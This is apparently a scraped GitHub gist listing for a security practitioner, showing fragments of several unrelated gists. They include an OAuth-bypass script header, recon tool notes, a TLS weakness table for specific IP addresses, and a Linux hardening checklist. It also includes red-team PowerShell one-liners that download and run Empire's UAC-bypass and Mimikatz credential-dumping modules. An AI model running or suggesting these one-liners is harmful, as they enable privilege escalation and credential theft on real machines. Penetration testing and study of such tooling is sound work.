@sec-js
sec-js / validOAuth.py
Last active March 27, 2023 19:39
oauth-authentication-bypass-via-oauth-implicit-flow
#!/usr/bin/env python3
# Authentication bypass via OAuth implicit flow
from bs4 import BeautifulSoup
import requests
import sys
import time
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
sec-js / gist:4cc20c78ca4797b0df490d4442198427
Created October 19, 2022 20:28
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
# AQUATONE
Aquatone is a tool for visual inspection of websites across a large amount of hosts and is convenient for quickly gaining an overview of HTTP-based attack surface.
## Installation
1. Install [Google Chrome](https://www.google.com/chrome/) or [Chromium](https://www.chromium.org/getting-involved/download-chromium) browser -- **Note:** Google Chrome is currently giving unreliable results when running in *headless* mode, so it is recommended to install Chromium for the best results.
2. Download the [latest release](https://github.com/michenriksen/aquatone/releases/latest) of Aquatone for your operating system.
3. Uncompress the zip file and move the `aquatone` binary to your desired location. You probably want to move it to a location in your `$PATH` for easier use.
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
# Import Mimikatz Module to run further commands
sec-js / AtomicTestsCommandLines.txt
Created June 21, 2022 08:21 — forked from jivoi/AtomicTestsCommandLines.txt
Atomic Tests - All Command Lines - Replace Input Arguments #{input_argument} - More Soon
[ASCII art banner: ATOMIC RED TEAM]
[********BEGIN TEST*******] Data Compressed T1002 has 3 Test(s)
sec-js / List IO
Created June 8, 2022 05:21
Output.csv
Affected Hosts | FQDN | NAT | Country | Status | Findings (one column per check) | Notes | Advice from Mandiant

Checks: SSL Certificate Signed Using Weak Hashing Algorithm (Known CA); SSL Certificate Expiry; SSL Certificate Chain Contains RSA Keys Less Than 2048 bits; SSL Version 2 and 3 Protocol Detection; SSL Medium Strength Cipher Suites Supported (SWEET32); SSL RC4 Cipher Suites Supported (Bar Mitzvah); SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam); TLS Version 1.0 Protocol Detection

40.83.150.233 (443/TCP) | MSFT | P
40.83.150.233 (454/TCP) | MSFT | P
40.83.150.233 (8172/TCP) | MSFT | P
52.249.56.193 (443/TCP) | MSFT | P | Notes: Azure App Gateway for TEL Customer
59.124.168.164 (443/TCP) | Taiwan | P
61.210.160.152 (443/TCP) | Japan | P
61.210.162.134 (443/TCP) | Japan | P
64.124.73

Advice from Mandiant:
§ Minimum Requirements for TLS Servers
NIST SP800-52
Avoid any use of the following:
1. SSLv2, SSLv3, TLS 1.0, and TLS 1.1
2. Null / Anonymous cipher suites
3. Any export cipher suites and encryption using less than 128 bits
sec-js / Fragment
Last active February 10, 2022 20:37
Questions Follow-up: I wanted to address two questions I provided answers to; I felt they were better explained visually than what I said during this conversation. Logic behind String(name) + ingestion + reverse name(string) + output of reverse strings:
#!/usr/bin/env python3
#
# Open foo.txt for binary writing (created if it does not exist)
fo = open("foo.txt", "wb")
print("Name of the file: ", fo.name)
# Close opened file
fo.close()
sec-js / Csinstall.txt
Created October 5, 2021 01:32
Vs studios install
$ curl https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > packages.microsoft.gpg
$ sudo install -o root -g root -m 644 packages.microsoft.gpg /usr/share/keyrings/
$ sudo sh -c 'echo "deb [arch=amd64 signed-by=/usr/share/keyrings/packages.microsoft.gpg] https://packages.microsoft.com/repos/vscode stable main" > /etc/apt/sources.list.d/vscode.list'
$ sudo apt-get install apt-transport-https
$ sudo apt-get update
$ sudo apt-get install code
sec-js / Proxy5.py
Created August 16, 2021 19:03
Proxy5
#!/usr/bin/env python3
# Filename s5.py
# Python Dynamic Socks5 Proxy
# Usage: python s5.py 1080
# Background Run: nohup python s5.py 1080 &
# Email: ringzero@557.im
import socket, sys, select, socketserver, struct, time

# Threaded TCP server: each client connection is served in its own thread
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass
curl "https://raw.githubusercontent.com/andreafabrizi/Dropbox-Uploader/master/dropbox_uploader.sh" -o dropbox_uploader.sh
sec-js / Linux hardening
Last active June 30, 2021 22:54
High level checklist
Linux hardening checklist
* Partitioning
  * Separate partitions
  * Restrict mount options
  * Polyinstantiated directories
  * Shared memory
  * Encrypt partitions
  * Summary checklist
* Physical Access
  * Password for Single User Mode